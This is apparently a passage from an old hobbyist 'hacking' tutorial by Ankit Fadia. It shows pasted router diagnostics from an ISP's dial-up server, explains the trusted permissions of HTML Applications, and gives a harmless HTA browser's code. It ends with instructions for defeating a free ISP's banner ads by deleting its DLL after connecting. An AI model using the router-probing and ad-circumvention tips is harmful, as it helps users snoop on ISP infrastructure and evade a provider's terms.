Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

--More-- Dialer state is idle

Serial0:14 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:15 - dialer type = ISDN

Dial String Successes Failures Last called Last status

0 incoming call(s) have been screened.

0 incoming call(s) rejected for callback.

Serial0:16 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:17 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

--More-- Serial0:18 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:19 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:20 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:21 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:22 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

--More-- Dialer state is idle

Serial0:23 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:24 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:25 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:26 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:27 - dialer type = ISDN

--More-- Idle timer (600 secs), Fast idle timer

(20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:28 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:29 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

Serial0:30 - dialer type = ISDN

Idle timer (600 secs), Fast idle timer (20 secs)

Wait for carrier (30 secs), Re-enable (15 secs)

Dialer state is idle

delhinas4>show snmp

Chassis: 11494401

646497 SNMP packets input

0 Bad SNMP version errors

0 Unknown community name

0 Illegal operation for community name supplied

1 Encoding errors

2402516 Number of requested variables

4 Number of altered variables

8281 Get-request PDUs

638211 Get-next PDUs

4 Set-request PDUs

918646 SNMP packets output

0 Too big errors (Maximum packet size 1500)

67 No such name errors

0 Bad values errors

0 General errors

646496 Response PDUs

272150 Trap PDUs

SNMP logging: enabled

Logging to 203.xx.243.63.162, 0/10, 270949 sent, 1201 dropped.

delhinas4>show history(This command displays a list of commands that you

have typed since your last login.)

show terminal

how

show tacas

show dialer

who

mstat

localhost

help

where

show history

SO this way you can use the Post Dial Up Screen which I hope you would now call the Router Prompt to get more information on Users and also the Server of your ISP itself.

Making Your Own Browser (HTML APPLICATIONS)

I felt that this manual wasn't complete without a mention of HTA Applications.

HTA Applications are basically HTML Applications which are unfortunately supported only by Internet Explorer 4 and above. An HTA Application is actually a full fledged application. With the development of HTA's Internet Explorer can now be used for creating and distributing full fledged powerful applications over the net. Basically HTA's are a cross between normal .exe files and the web pages that are displayed by Internet Explorer.

Normally only proper programming languages like C++ or Perl or VisualBasic had the access to system resources, but with the introduction of HTA's, this power now extends to DHTML (Dynamic HyperText MarkUp Language).

HTA not only supports everything that a normal webpage supports like, CSS (Cascading Style Sheets),scripting languages,methods behaviours etc, but also gives the developer access to the client's system, an opportunity to control the User Interface of the Application, and many various other aspects which we couldn't control earlier. Best of all, it runs as a trusted application, which means it is not tied down with the same security restrictions, normal web pages are subjected to. A HTA behaves like a normal .exe file, with the user being asked once, before the HTA is downloaded, whether to save or run the application; if saved to the client's system, it can be executed anytime later, just like a normal .exe file can be.

A HTA application is nothing but a .html file saved with a .hta extension name.The only difference between the commands that can be used on a web page and the commands that can be used on a HTA Application are the addition of some new commands which are native to HTA Applications. An HTA Application can be executed by either double-clicking its program icon, or running it from the Start menu, opening it through a URL, or by starting it from the command line.

Now before we move on to HTA Specific commands, let's write the mandatory Hello World! Program.This program is just for the formality sake, so that you get the basic idea, as to how a HTA functions and it is Okay even if you do not understand anything yet. Just Copy the following piece of code and save it with any name of your choice, just make sure that

<HTML>

<TITLE>My First HTA</title>

<HEAD>

<HTA:APPLICATION >

</HEAD>

<BODY SCROLL="yes">

Hello World!!!

</BODY>

</HTML>

 

The .hta extension tells the system how to handle this particular application.The new HTA:APPLICATION tells the application windows, how to behave as a application. This new tag has many attributes which give us complete control over the function and the Application Windows of our HTA.This new HTA:APPLICATION tag should appear within the HEAD tag and should contain the necesarry attributes which control features of the HTA which are not available in DHTML. Now to understand the HTA specific attributes, lets take the following example:

<HEAD>

<TITLE>My First HTA Application</TITLE>

<HTA:APPLICATION ID="htapp"

APPLICATIONNAME="My First HTA APP"

BORDER="none"

CAPTION="yes"

ICON="/icon.gif"

SHOWINTASKBAR="no"

SINGLEINSTANCE="yes"

SYSMENU="no"

WINDOWSTATE="maximize"

>

</HEAD>

We conclude the following from the above piece of code:

1. When launched the HTA is known to the system as My First HTA APP(Controlled by Applicationname attribute.

2. The HTA App does not have a border.(Controlled by Border Attribute.) When border is set to none, neither the window border, program icon, title bar, nor Minimize and Maximize buttons will display.

3. The HTA App will have a title bar or a caption bar.(Controlled by Caption Attribute). When CAPTION is set to no, the Minimize and Maximize buttons, the program icon, and the window border are disabled.

4. The Icon which is displayed in Explorer or in the taskbar or in the Title bar will be /icon.gif.(contolled by ICON attribute.)

5. The HTA App will not be shown in the taskbar.(Controlled by Showintaskbar.)

6. Only a single instance of the app can be launched at a particular time.(Controlled by Singleinstance.)

7. It will not have a standard system program icon.(Controlled by Sysmenu.) When sysMenu is set to no, not only the program icon, but also the Minimize and Maximize buttons are disabled.

8. The HTA Window will be by default launched maximised.

9. The id attribute works the same way, it normally does.

When the above HTA is run, it shows the text within the <TITLE> tag on the caption bar of that application, and the code within the <BODY> tag is executed.

*********************

Hacking Truth: As HTA's are executed as fully trusted applications, they have the ability to carry out actions which Internet Explorer would never allow a regular web page to perform. HTA's have full permit to manipulate the client machine. It has read.write access to the client machine's files, and also the system registry. The command codes are also supported.They also allow cross domain scripting. Not only that, they also allow embedded Java Applets and ActiveX Controls to be run without any warning message irrespective of the security settings of the browser.

To understand how HTA's security works, read the following excerpt from SBN:

------------------SBN--------------

HTA windows can extend the trust relationship to content in other domains.

HTAs allow cross-domain script access between window objects and cookies. To address the security risks inherent in cross-domain scripting, HTA enables the APPLICATION attribute for FRAMEs and IFRAMEs. This HTA-only attribute is not the sole security precaution available. HTAs are designed such that FRAMEs and IFRAMEs, where the APPLICATION attribute is set to no, have no script access to the HTA containing them. In this way, no unsecure content is allowed into an HTA through an untrusted window.

HTAs are designed such that untrusted HTML FRAMEs and IFRAMEs have no script access to the HTA containing them. In the case of FRAMEs that are not HTA-enabled, the highest level frame comprises the top window for all FRAMEs it contains. For that FRAME, window.top and window.self are one and the same. In addition, unsafe FRAMEs and IFRAMEs receive neither a referrer nor an opener URL from the parent HTA. The end result is that they are unaware of the containing HTA as the parent window. In applications where all content is safe, FRAMEs and IFRAMEs can safely be marked as trusted. Wizards and control panels are examples of safe content.

The HTA-enabled status of the IFRAME in the example below permits it to pass information back to its parent window. <IFRAME SRC="filename.htm" APPLICATION="yes"> By contrast, an IFRAME that allows browsing to unsecured content must be implemented as regular HTML. Content in the IFRAME example below is subject to the security setting for its zone. The following IFRAME can be used when embedding HTML.

<IFRAME SRC="filename.htm" APPLICATION="no">

Note The APPLICATION attribute is ignored if used in HTML rather than HTA. When running HTAs, users should take the same precautions as with any executable: Only install HTAs produced by reliable sources. HTAs cannot be code-signed. However, they can be installed from signed cabinet (.cab) files or other signed installation formats. Either way, the most accountable sources will be corporate intranets and established software vendors.

-------------------------SBN----------------------------------

So one can see how dangerous from a normal person's viewpoint and how interesting from a hacker's viewpoint, HTA's can be. So basically to save yourself from evil Java Applets disable Java. Also run only those HTA's they are signed or you receive from trusted senders.

************************

The following is the code of a browser that actually is a HTA which I coded in HTML, Javascript. To understand how it was made and to improve the code, you will need basic knowledge of the two.

This browser is based on the open source concept and anyone can contribute to it's code and improve it's functionality. So all you hardcore programmers, charge your grey cells and contribute to the development of this browser.

All those of you who are new to hacking (programming) please, take my advice and learn at least two or three programming languages. For the time being use the below browser and start enjoying your browsing experience. Simple copy the following into notepad or anyother editor and save it with an extension name of .hta

<html>

<head>

<TITLE>The Hacking Truths Browser.</TITLE>

<HTA:APPLICATION

APPLICATIONNAME="The Hacking Truths Browser."

ICON="icon_name_here.ico"

WINDOWSTATE="normal">

</head>

<body>

<span id=abar

style="overflow: none">

<span

id=AText><b>Address</b></span>

<input type=text

value=http://hackingtruths.tripod.com

id=URL

width="80"

style="width: expression(document.body.clientWidth -

AText.offsetWidth -

AGo.offsetWidth -85)">

<input type=button

value="Go"

id=AGo onclick="navigate()"><br>

<span>

<br>

<iframe

src="http://hackingtruths.tripod.com" id=data

style="width:

100%; height: 85%"></iframe>

<script language=JScript>

function navigate() {

document.all.data.src = URL.value;

}

function clickShortcut() {

if (window.event.keyCode == 13) {

navigate()

}

}

 

URL.onkeypress =

clickShortcut;

</script>

<br>Coded By: <b>Ankit Fadia</b> ankit@bol.net.in<br>Visit us at: <a

href="http://hackingtruths.tripod.com">http://hackingtruths.tripod.com/a>

</body>

</html>

Removing Banners From Free ISP Services

There are many new Internet Service Providers which give absolutely free Internet access, of course you do need to pay for the telephone bill. These free ISP's make money by the advertisements that they display in the form of a banner which covers a part of your screen each time you connect to the Internet.

Well, these banners are quite a nuisance as they clog bandwidth and slow down our Internet Connection. The advertisements displayed by them, share your modem to load. Wanna learn how to remove this bar and still access the net for free? Well read on.

The answer to this hack lies in some kewl files called Dynamic Link Libraries. First lets see what .dll files are used for. Dynamic Link Libraries is basically a collection of commands or data which control how a program looks. Take the example of Microsoft Office. Now whenever you launch it, the main .exe file reads the .dll file associated with it and accordingly displays the toolbars. [NOTE: Almost all Windows applications use the same .dll file to display say the Title Bar]. So basically we can conclude that .dll files are most commonly used to change the way applications look.

Now the good thing about Dynamic Libraries is that they can be loaded or unloaded when a particular program has stopped using it. This is done to save resources or memory. They can also be shared at the same time by various applications.

Now before we go on to the hack let's learn how these free ISP's work.

When you click on the Connect button, the Modem dials into the FREE ISP and tries to connect. Before the connection is fully established, the FREE ISP software checks to see if the .dll file associated with exists or not. If yes, then it connects and a banner pops up. On the other hand, if the .dll file does not exist then the FREE ISP Software refuses to connect. So what you need to do in order to surf for free without the irritating Banner ads, first connect to the FREE ISP's server, and once the connection has been established (screeching sound stops), delete the .dll file associated with it. It is that simple. The only thing you need to know is which .dll file to delete.

To find out the .dll files associated with your FREE ISP Software, install the software on a clean machine (where the same software has not been installed earlier). Then using the FIND tool (START >Find) locate all Dynamic Link Libraries (*.dll) which have been created or modified during the last one day (Under the Date Modified Tab). This will be foolproof only if no other software has been installed during the last 24 hours.

Ankit Fadia

ankit@bol.net.in

To receive more tutorials on Hacking, Perl, C++ and Viruses/Trojans join my mailing list:

Send an email to programmingforhackers-subscribe@egroups.com to join it.